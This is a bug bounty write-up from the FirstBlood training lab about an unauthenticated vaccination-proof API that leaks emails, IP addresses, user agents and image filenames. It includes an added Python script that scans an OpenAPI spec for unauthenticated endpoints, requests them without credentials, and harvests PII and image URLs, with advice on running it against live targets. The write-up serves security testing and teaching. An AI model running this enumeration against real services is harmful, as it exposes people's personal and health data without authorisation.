FirstBlood-#943 — Endpoint discloses information about all vaccination proof records
This issue was discovered on FirstBlood v2
On 2021-10-30, 0xblackbird (Level 5) reported:
Hello! I found an endpoint that discloses way more information than it actually should. The following endpoint, /vaccination-manager/api/vax-proof-list.php, discloses the email address, proof image filename, public IP address and user agent of users who have made use of the functionality.
Steps to reproduce
- First of all, to view the info, we need to submit information (this can be done by anyone). Navigate to /vaccination-manager/pub/upload-vaccination-proof.php and upload any image + fill in a valid email address.
- From the swagger.yaml, we can see that there's an endpoint that returns all the information of users who've submitted something in the form.
- Requesting the endpoint gives us the following:
- As you can see, all the information we entered before is available for everyone here, including the proof itself, which we can request at /upload/{hash}.jpg
Kind regards,
0xblackbird
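The two-step check the report walks through (read swagger.yaml for operations that declare no security requirement, call each one without credentials, and look for personal data in what comes back) can be scripted so it is repeatable across a whole spec rather than done by hand. The following is an added example written for this page; it is not the reporter's code or FirstBlood's. The OpenAPI fragment, the JSON response body, the field names (email, proof, ip, ua) and the /hypothetical/protected-endpoint.php path are all constructed to mirror the report, since the page does not reproduce the real spec or response; only the two paths named in the report are real. The fetch function is injectable so the audit runs offline here and can be pointed at a live host by swapping in an HTTP client.

```python
"""Audit an OpenAPI spec for operations with no security requirement,
request each without credentials, and flag responses carrying PII.

Added example for this report, not FirstBlood's code. The spec fragment,
the response body and /hypothetical/protected-endpoint.php are constructed;
the vax-proof-list.php and /upload/{hash}.jpg paths come from the report.
"""
import json
import re
from typing import Callable, Dict, Iterator, List, Tuple

# Constructed OpenAPI 3 fragment modelled on the report's swagger.yaml.
# The protected operation is hypothetical; it only shows the contrast
# between an operation with a security requirement and one without.
SPEC = {
    "openapi": "3.0.0",
    "security": [],  # no global requirement, so operations default to open
    "paths": {
        "/vaccination-manager/api/vax-proof-list.php": {
            "get": {"summary": "List all submitted vaccination proofs"}
        },
        "/hypothetical/protected-endpoint.php": {
            "post": {"security": [{"sessionCookie": []}]}
        },
    },
}

# Constructed response body: the field names and values are assumptions
# shaped by the four kinds of data the report says the endpoint leaks.
SAMPLE_RESPONSE = json.dumps([
    {"id": 1, "email": "alice@example.com",
     "proof": "5d41402abc4b2a76b9719d911017c592.jpg",
     "ip": "203.0.113.7", "ua": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"id": 2, "email": "bob@example.org",
     "proof": "7d793037a0760186574b0282f2f435e7.jpg",
     "ip": "198.51.100.23", "ua": "Mozilla/5.0 (Windows NT 10.0)"},
])

# Whole-value matchers for the PII classes named in the report.
PII_PATTERNS = {
    "email": re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$"),
    "ipv4": re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$"),
    "user_agent": re.compile(r"^Mozilla/\d"),
    "upload_filename": re.compile(r"^[0-9a-f]{32,64}\.(?:jpe?g|png|gif)$", re.I),
}

HTTP_METHODS = {"get", "post", "put", "patch", "delete"}


def unauthenticated_operations(spec: dict) -> Iterator[Tuple[str, str]]:
    """Yield (METHOD, path) for operations with no security requirement.
    A per-operation `security` list overrides the global one; an explicit
    empty list means 'no auth', and a missing key inherits the global."""
    global_sec = spec.get("security", [])
    for path, ops in spec.get("paths", {}).items():
        for method, op in ops.items():
            if method.lower() in HTTP_METHODS and not op.get("security", global_sec):
                yield method.upper(), path


def classify_pii(value: str):
    """Return the PII label for a string value, or None."""
    for label, pattern in PII_PATTERNS.items():
        if pattern.search(value):
            return label
    return None


def scan_records(body: str) -> Dict[str, List[str]]:
    """Map each response field to the PII classes seen in it across all records."""
    data = json.loads(body)
    records = data if isinstance(data, list) else [data]
    findings: Dict[str, set] = {}
    for rec in records:
        if not isinstance(rec, dict):
            continue
        for key, val in rec.items():
            label = classify_pii(val) if isinstance(val, str) else None
            if label:
                findings.setdefault(key, set()).add(label)
    return {k: sorted(v) for k, v in findings.items()}


def proof_urls(body: str, base: str = "/upload/") -> List[str]:
    """Turn leaked proof filenames into the /upload/{hash}.jpg URLs the report describes."""
    return [base + val for rec in json.loads(body) for val in rec.values()
            if isinstance(val, str) and PII_PATTERNS["upload_filename"].search(val)]


def audit(spec: dict, fetch: Callable[[str, str], Tuple[int, str]]) -> List[dict]:
    """Call every open operation with no credentials; report those returning PII."""
    results = []
    for method, path in unauthenticated_operations(spec):
        status, body = fetch(method, path)
        if status != 200:
            continue
        try:
            pii = scan_records(body)
        except ValueError:  # not JSON, nothing to classify
            continue
        if pii:
            results.append({"method": method, "path": path, "pii_fields": pii})
    return results


def offline_fetch(method: str, path: str) -> Tuple[int, str]:
    """Stand-in for an HTTP client that sends no cookies or tokens."""
    if path == "/vaccination-manager/api/vax-proof-list.php":
        return 200, SAMPLE_RESPONSE
    return 401, ""


if __name__ == "__main__":
    for finding in audit(SPEC, offline_fetch):
        print(finding["method"], finding["path"], finding["pii_fields"])
    print(proof_urls(SAMPLE_RESPONSE))
```

Against a live target, replace offline_fetch with a function that issues the request through your HTTP client with no session cookie or Authorization header; a 200 with classified fields is the unauthenticated leak, and any filename it yields should then be requested under /upload/ to confirm the proof images are reachable as well.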
P1 CRITICAL
Endpoint: /vaccination-manager/api/vax-proof-list.php
This report contains multiple vulnerabilities:
FirstBlood ID: 37
Vulnerability Type: Information leak/disclosure
The endpoint /vaccination-manager/api/vax-proof-list.php leaks PII without any authentication. The intended solution was to find it via swagger-ui at /vaccination-manager/api.php.
FirstBlood ID: 31
Vulnerability Type: Information leak/disclosure
The endpoint api.php can be found under the vaccination manager portal directory; it allows for user interaction and results in a PII leak on vax-proof-list.php.